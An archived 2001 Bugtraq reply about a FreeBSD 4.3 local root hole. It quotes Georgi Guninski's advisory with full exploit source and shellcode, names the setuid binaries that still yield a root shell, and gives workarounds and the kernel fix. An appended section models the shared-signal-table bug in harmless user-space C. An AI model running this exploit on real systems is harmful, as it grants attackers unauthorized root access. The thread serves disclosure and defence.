Date:      Wed, 11 Jul 2001 12:19:39 +0400 (MSD)
From:      Seva Gluschenko <gvs@rinet.ru>
To:        Bug Track <bugtraq@securityfocus.com>
Cc:        <security@freebsd.org>
Subject:   Re: FreeBSD 4.3 local root
Message-ID:  <20010711121224.J96652-100000@localhost>
In-Reply-To: <3B4B0E7B.1492C76A@guninski.com>

Message from Georgi Guninski at Jul 10 17:17 in parts:

GG> Systems affected:
GG> FreeBSD 4.3 and probably earlier versions.

Confirmed for 3-STABLE

GG> Exploit:
GG>
GG> Examine the source and don't send me mail if you get SEGV.

well, actually, your native exploit doesn't work due to a little
"mistake" inside ;)

But, it was easy to correct %|

Well, after a bunch of tests I've found only two suids which gave me a
suid shell:

/usr/bin/passwd
/usr/local/bin/ssh1

a lot of others, including login/rlogin, gave me either a non-suid
shell or just a coredump (which is worse, of course).

So, a quick workaround should be

chmod o-rx /usr/bin/passwd
chmod u-s /usr/local/bin/ssh1

Of course, it does NOT save the system in general but can
significantly decrease the first-step risk.

GG> http://www.guninski.com/vvfreebsd.c
GG>
GG> -------------vvfreebsd.c----------------------
GG>
GG> /*
GG> FreeBSD 4.3 local root exploit using shared signals.
GG> Written by Georgi Guninski http://www.guninski.com
GG> */
GG>
GG> #include <stdio.h>
GG> #include <stdlib.h>     /* getenv, setenv, exit */
GG> #include <signal.h>
GG> #include <unistd.h>     /* rfork, execl, execle, getpid, sleep */
GG> #include <sys/types.h>
GG>
GG> char *vv1;   /* where the shellcode sits in our environment */
GG>
GG> #define MYSIG SIGINT
GG>
GG>
GG> //exec "/tmp/sh", shellcode gotten from the internet and modified
GG> //(i386 FreeBSD: setuid-family calls to uid 0, then execve("/tmp//sh"))
GG> unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
GG> "\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
GG> "\x31\xc0\x50\x50\xb0\x17\xcd\x80"
GG> "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
GG>                   "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53"
GG>                   "\xb0\x3b\x50\xcd\x80\x90\x90\x90";
GG>
GG> typedef void (*PROG)(void);
GG> extern char **environ;
GG>
GG> int main(int ac,char **av)
GG> {
GG> int pid;
GG> //(*(PROG)bsdshell)();
GG> // First pass: put the shellcode into the environment and re-exec
GG> // ourselves, so its address can be read back with getenv().
GG> if(!(vv1=getenv("vv")))
GG>  {
GG>   setenv("vv",(char *)bsdshell,1);
GG>   if(execle(av[0],"vv",(char *)NULL,environ)<0)
GG>    {
GG>     perror("weird exec");
GG>     exit(1);
GG>    }
GG>  }
GG>
GG> printf("vvfreebsd. Written by Georgi Guninski\n");
GG> printf("shall jump to %p\n",(void *)vv1);
GG>
GG> // Child shares our signal handler table (RFSIGSHARE) and execs a
GG> // setuid binary; the unpatched kernel keeps the table shared.
GG> if(!(pid=rfork(RFPROC|RFSIGSHARE)))
GG>  {
GG>   printf("child=%d\n",getpid());
GG> // /usr/bin/login and rlogin work for me. ping gives nonsuid shell
GG> //  if(!execl("/usr/bin/rlogin","rlogin","localhost",(char *)NULL))
GG>   if(execl("/usr/bin/login","login",(char *)NULL)<0)
GG>    {
GG>     perror("exec setuid failed");
GG>     exit(2);
GG>    };
GG>  }
GG> sleep(2);
GG> // Install the handler only after the child's exec has reset the
GG> // table; it lands in the shared table, so the setuid child has it too.
GG> signal(MYSIG,(sig_t)vv1);
GG> sleep(2);
GG> kill(pid,MYSIG);
GG> printf("done\n");
GG> while(42);
GG> }
GG>
GG> ----------------------------------------------
GG>
GG> Workaround/Solution:
GG> As far as I know patches for this problem are committed for both
GG> -current and -stable.
GG> From "CVS log for src/sys/kern/kern_exec.c"
GG> [MFC: do not share sigs after an exec]
GG> The main diff seems to be at:
GG> http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/kern/kern_exec.c.diff?r1=1.107.2.7&r2=1.107.2.8&f=h
GG>
GG> Vendor status:
GG> FreeBSD was informed on 2 July 2001 (sent them broken attachment on 1
GG> July).
GG>
GG> Some comparison of vendor response times from my personal experience:
GG> FreeBSD seem to have fixed this in 7 days.
GG> OpenBSD fixed my previous advisory in 6 days.
GG> Microsoft are much slower.
GG>
GG> Regards,
GG> Georgi Guninski
GG> http://www.guninski.com
GG>

SY, Seva Gluschenko, just stranger on The Road. | http://gvs.rinet.ru/
Cronyx Plus / RiNet network administrator.      | GVS-RIPE | GVS3-RIPN
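Both messages above turn on the same kernel behaviour: a child created with rfork(RFPROC|RFSIGSHARE) keeps sharing the parent's signal-handler table even after it execs a setuid-root image, so a handler the unprivileged parent installs afterwards is what the privileged child runs when signalled. The CVS log line quoted by Guninski, "do not share sigs after an exec", names the fix. The block below is an added example, written for this page and not taken from either poster or from the FreeBSD source: a user-space C model of that table, of rfork's sharing, and of exec with and without the fix. The struct and function names (procsig, refcnt, model_*) are illustrative; the only kernel facts it leans on are the ones stated in the thread plus the standard rule that exec resets caught handlers to default.

```c
/*
 * Model of FreeBSD's shared signal-handler table (rfork RFSIGSHARE) and of
 * the kern_exec.c fix "do not share sigs after an exec".
 * Added example, user-space only; names are illustrative, not kernel code.
 */
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

#define MODEL_NSIG 64
typedef void (*handler_t)(int);

/* One handler table, reference counted; rfork(RFSIGSHARE) makes parent
 * and child point at the same one. NULL stands for SIG_DFL. */
struct procsig {
    int refcnt;
    handler_t sa[MODEL_NSIG];
};

struct proc {
    int pid;
    int euid;             /* 0 after a successful setuid-root exec */
    struct procsig *ps;   /* possibly shared with rfork siblings */
};

static int next_pid = 1000;

static void sig_reset(struct procsig *ps)          /* all handlers -> SIG_DFL */
{
    for (int i = 0; i < MODEL_NSIG; i++) ps->sa[i] = NULL;
}

static struct procsig *procsig_new(void)
{
    struct procsig *ps = malloc(sizeof *ps);
    if (!ps) abort();
    ps->refcnt = 1;
    sig_reset(ps);
    return ps;
}

static void procsig_drop(struct procsig *ps)
{
    if (--ps->refcnt == 0) free(ps);
}

struct proc *model_proc_new(int euid)
{
    struct proc *p = malloc(sizeof *p);
    if (!p) abort();
    p->pid = next_pid++;
    p->euid = euid;
    p->ps = procsig_new();
    return p;
}

/* rfork(RFPROC|RFSIGSHARE): the child shares the parent's table. */
struct proc *model_rfork_sigshare(struct proc *parent)
{
    struct proc *c = malloc(sizeof *c);
    if (!c) abort();
    c->pid = next_pid++;
    c->euid = parent->euid;
    c->ps = parent->ps;
    c->ps->refcnt++;
    return c;
}

/* exec of a setuid-root image. Every exec resets caught handlers.
 * unshare_on_exec == 0: 4.3-RELEASE behaviour, the reset happens in the
 * still-shared table and the sharing survives.
 * unshare_on_exec == 1: patched behaviour, a private copy is taken first. */
void model_exec_setuid_root(struct proc *p, int unshare_on_exec)
{
    if (unshare_on_exec && p->ps->refcnt > 1) {
        struct procsig *np = procsig_new();
        procsig_drop(p->ps);
        p->ps = np;
    }
    sig_reset(p->ps);
    p->euid = 0;
}

/* signal(2) in process p; kill(2) delivery returns the handler the *target*
 * would run in its own context, NULL for the default action. */
void model_signal(struct proc *p, int sig, handler_t h) { p->ps->sa[sig] = h; }
handler_t model_deliver(struct proc *target, int sig) { return target->ps->sa[sig]; }

static void attacker_payload(int sig) { (void)sig; }   /* stands in for bsdshell */

static void model_free(struct proc *p) { procsig_drop(p->ps); free(p); }

/* Replays the order of events in vvfreebsd.c: rfork, child execs a setuid
 * binary, parent installs its handler afterwards, parent kills the child.
 * Returns 1 if the payload would run with euid 0. */
int model_attack_succeeds(int kernel_patched)
{
    struct proc *parent = model_proc_new(1001);
    struct proc *child  = model_rfork_sigshare(parent);
    model_exec_setuid_root(child, kernel_patched);
    model_signal(parent, SIGINT, attacker_payload);
    int hit = model_deliver(child, SIGINT) == attacker_payload && child->euid == 0;
    model_free(child);
    model_free(parent);
    return hit;
}

/* Why the exploit sleeps before signal(): on the unpatched kernel the
 * child's exec wipes the shared table, taking the parent's handlers with it.
 * Returns 1 if a handler installed before the exec is still there after. */
int model_preexec_handler_survives(int kernel_patched)
{
    struct proc *parent = model_proc_new(1001);
    struct proc *child  = model_rfork_sigshare(parent);
    model_signal(parent, SIGINT, attacker_payload);
    model_exec_setuid_root(child, kernel_patched);
    int kept = model_deliver(parent, SIGINT) == attacker_payload;
    model_free(child);
    model_free(parent);
    return kept;
}

int main(void)
{
    printf("unpatched: attack %s\n", model_attack_succeeds(0) ? "succeeds" : "fails");
    printf("patched:   attack %s\n", model_attack_succeeds(1) ? "succeeds" : "fails");
    return 0;
}
```

The model leaves out the part that made the real exploit binary-dependent in Gluschenko's tests: the handler address the parent installs is only useful if the shellcode string sits at that same address in the setuid image's environment, which is what the self re-exec with the "vv" variable is trying to arrange. When the layout differs, the child jumps into garbage, which matches the core dumps he reports for login and rlogin.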


Archive URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010711121224.J96652-100000>